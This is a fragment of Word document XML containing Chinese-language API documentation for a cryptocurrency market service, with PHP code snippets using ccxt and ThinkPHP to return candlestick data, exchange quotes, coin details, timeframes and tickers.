          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>时间戳</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>单位：毫秒</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>开盘价格</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>最高价格</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>最低价格</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>收盘价格</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>交易量（已基准货币计量）</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540CB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6BD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ohlcv()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5073B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5EC7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0928B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7B4709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6F54F9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F071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0845FF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 = input('post.symbol');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0076C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$timeframe = input('post.timeframe');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6888BD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$id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DCB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(array (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E325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'enableRateLimit' =&gt; true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7C2D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FBD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$markets = $exchange-&gt;load_markets();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BA52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($exchange-&gt;has['fetchOHLCV']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10FBBA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json($exchange-&gt;fetch_ohlcv ($symbol, $timeframe));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24268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($exchange-&gt;markets as $symbol =&gt; $market) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E79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usleep ($exchange-&gt;rateLimit * 1000); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E1B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return json($exchange-&gt;fetch_ohlcv ($symbol, '1M')); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C229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C5B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B14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1AEC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00AE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/api/market/oclhv </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>蜡烛图（</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>oclhv</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002E3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蜡烛图（</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>oclhv</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09008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73C9DE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27BAF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7E1B8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symbol   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>交易对</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0036CC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timeframe   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>时间框架（需要先调用【返回交易所时间框架】获取交易所支持哪些时间框架）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514587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7540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oclhv()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74299A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2019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196DA3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1E214E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7EC98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1585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189C71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 = input('post.symbol');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B25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$timeframe = input('post.timeframe');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0808BB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$exchange_id = '\\ccxt\\' . $id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521D88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(array (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52069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'enableRateLimit' =&gt; true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62052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C678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$markets = $exchange-&gt;load_markets();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0806FD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($exchange-&gt;has['fetchOHLCV']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F41E7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$ohlcv=$exchange-&gt;fetch_ohlcv ($symbol, $timeframe);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5EB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$change_of_position=function($arr){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428DC3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$ret=[$arr[0],$arr[1],$arr[4],$arr[3],$arr[2],$arr[5]];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539D1F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array_values($ret);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD732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C21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json(array_map($change_of_position, $ohlcv));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BB23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3C5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888D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BA39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/api/market/exchange_quote </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>返回交易所的报价货币</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53382E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返回交易所的报价货币</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5C0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3DCFE5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BB300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4D2B8E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0114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exchange_quote()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1383D0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D41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5EAFCE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19A37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2F25A1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8C4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3853E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$id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065542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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDA4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$markets = $exchange-&gt;load_markets();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4464B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$symbol_quote = function ($symbol) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668CE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 = explode('/', $symbol);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45822D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$arr[0];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E238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A7FE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$quote = array_map($symbol_quote, $exchange-&gt;symbols);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE61A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$quote_unique = array_unique($quote);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8E6E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array_values($quote_unique);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F34E2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F2A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64D9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/api/market/coin_info </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟币详情</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF8B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虚拟币详情</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD537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77CD86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2B985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42451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coin </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟币</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9C2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id </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B1E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currency </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟币名称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2447A9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fullname </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟币全称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3473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icon </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>icon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334D8B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fullname_zh </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟币中文全称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F059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{String} introduction_zh </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中文简介</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA088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release_time </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>发布时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C91D5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release_price </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>发布价格</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BCBA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white_paper </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>白皮书</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703E6D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block_url </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>区块链接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F68B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official_website </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>官网</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E42A0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circulation </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>流通量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D025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total_circulation </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>发行量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E29C0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follow_num </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>加入自选数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C18E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kind </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟币分类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36858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follow </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前登录用户是否已经关注该虚拟币：</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CE8E0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public_blockchain </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>公链</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFCD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exchange_num </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>上架交易所数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA6B8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{Object} exchange </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>交易所</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090533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exchange.id id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279A84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exchange.name </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>名称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCAA0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exchange.exchange </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标识（其他接口</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>exchange</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数使用这个字段）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117869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exchange.logo logo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537EF9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exchange.details </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>简介</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494590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exchange.address </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCBDF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exchange.symbol_num </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>交易对数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043A4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exchange.score </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>评分</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0B6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exchange.market_value </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>市值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC2B6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E368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coin_info()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A304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7E2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validate('Coin');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48858E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46C3C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605C17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F3F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$where['currency']=input('post.coin');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747FB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$db=db('coin')-&gt;where($where)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FD5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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D35B0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$platform_where['exchange']=['in', array_filter(explode(',', $db['exchange']))];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBA3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$db['exchange']=Db::name('platform')-&gt;where($platform_where)-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2607BA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$db['icon'] = '/public/coin/icon/' . strtolower($db['currency']) . '@2x.png';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117E44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$db['follow'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3407D8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2C043A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$db['follow'] = Db::name('member_coin')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394DF4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=&gt; $this-&gt;memberId, 'coin_id' =&gt; $db['id']])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB12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CFAB1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67DC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json($db);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737E2A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A3D42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未找到虚拟币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2E34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A68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398F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/api/market/exchange_timeframes </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>返回交易所时间框架</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0437FC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返回交易所时间框架</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D365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32DD6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3AE6A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053154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940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exchange_timeframes()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B00B8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BDA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180EDE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0D6CBB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1F6424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D674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41495C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$id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36655B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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698232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$markets = $exchange-&gt;load_markets();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CCFD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json($exchange-&gt;timeframes);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D369C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1083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9DBC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/api/market/ticker </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获取指定交易对实时行情</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6854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获取指定交易对实时行情</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468B53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6A05E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FE2C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3B3364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symbol    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>交易对</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB159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open  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>开盘价</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B0A3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high  24</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>小时最高</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6C17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low  24</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>小时最低</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C29B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close  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>收盘价</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC50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change      24</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>小时价格变动</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DBE2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percentage  24</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>小时价格变动百分比</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8E91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base_volume 24</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>小时内基准货币交易量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E817A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quote_volume 24</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>小时内报价货币交易量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085109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F0E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ticker()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1DB1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1CD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1A5F8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5E04C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7751A1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A555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0ECEAD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 = input('post.symbol');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E8AD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$where['symbol']=$symbol;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E52B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$ticker=Db::name('ticker')-&gt;where($where)-&gt;order('ticker_timestamp DESC')-&gt;limit(1)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26389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($ticker) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CDFA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 ($ticker);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700F9D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1716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C3ED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6DA2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/api/market/kind </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获取虚拟币分类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF903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获取虚拟币分类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550CD0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67B684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00551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1D2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 </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应用分类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45710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D5EC3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kind()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5782B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C75B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$kind=db('coin')-&gt;field('kind')-&gt;group('kind')-&gt;select();</w:t>
      </w:r>
